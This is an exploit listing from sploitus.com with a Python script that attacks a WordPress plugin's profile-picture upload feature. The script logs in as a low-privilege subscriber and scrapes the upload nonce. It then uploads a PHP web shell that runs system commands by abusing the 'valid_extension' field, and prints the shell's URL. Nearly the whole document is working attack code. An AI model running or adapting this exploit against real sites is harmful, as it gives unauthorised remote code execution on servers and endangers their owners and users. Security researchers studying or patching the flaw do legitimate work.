## https://sploitus.com/exploit?id=WPEX-ID:968C677C-1BEB-459B-8FD1-7F70BCAA4F74
The following Python script automates the exploitation of this plugin by uploading a malicious PHP file (tested on a default installation of WordPress 6.1)
---
import io
import random
import re
import string
import requests
BASE_URL = input("Enter the target URL: ")
USERNAME = input("Enter the subscriber user: ")
PASSWORD = input("Enter the user password: ")
PAYLOAD = io.StringIO("""\
<?php passthru('id');
""")
FILENAME = "".join(random.choices(string.ascii_letters, k=10)) + ".php"
with requests.Session() as session:
session.headers.update({
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
})
# Authenticate as user.
session.get(f"{BASE_URL}/wp-login.php")
response = session.post(f"{BASE_URL}/wp-login.php", data={
"log": USERNAME,
"pwd": PASSWORD,
"wp-submit": "Log In",
"testcookie": "1"
})
# Extract the "user_registration_profile_picture_upload_nonce" nonce
if '","user_registration_profile_picture_upload_nonce":"' not in response.text:
print("[!] Nonce not found :(")
exit(1)
match = re.search(r'\"user_registration_profile_picture_upload_nonce\":\"(\w+)\"', response.text)
if not match:
print("[!] Nonce not found :(")
exit(1)
nonce = match.group(1)
# Upload the payload
response = session.post(f"{BASE_URL}/wp-admin/admin-ajax.php", data={
"action": "user_registration_profile_pic_upload",
"security": nonce,
"valid_extension": "application/php",
}, files={"file": (FILENAME, PAYLOAD)})
print(response.json()["data"]["url"])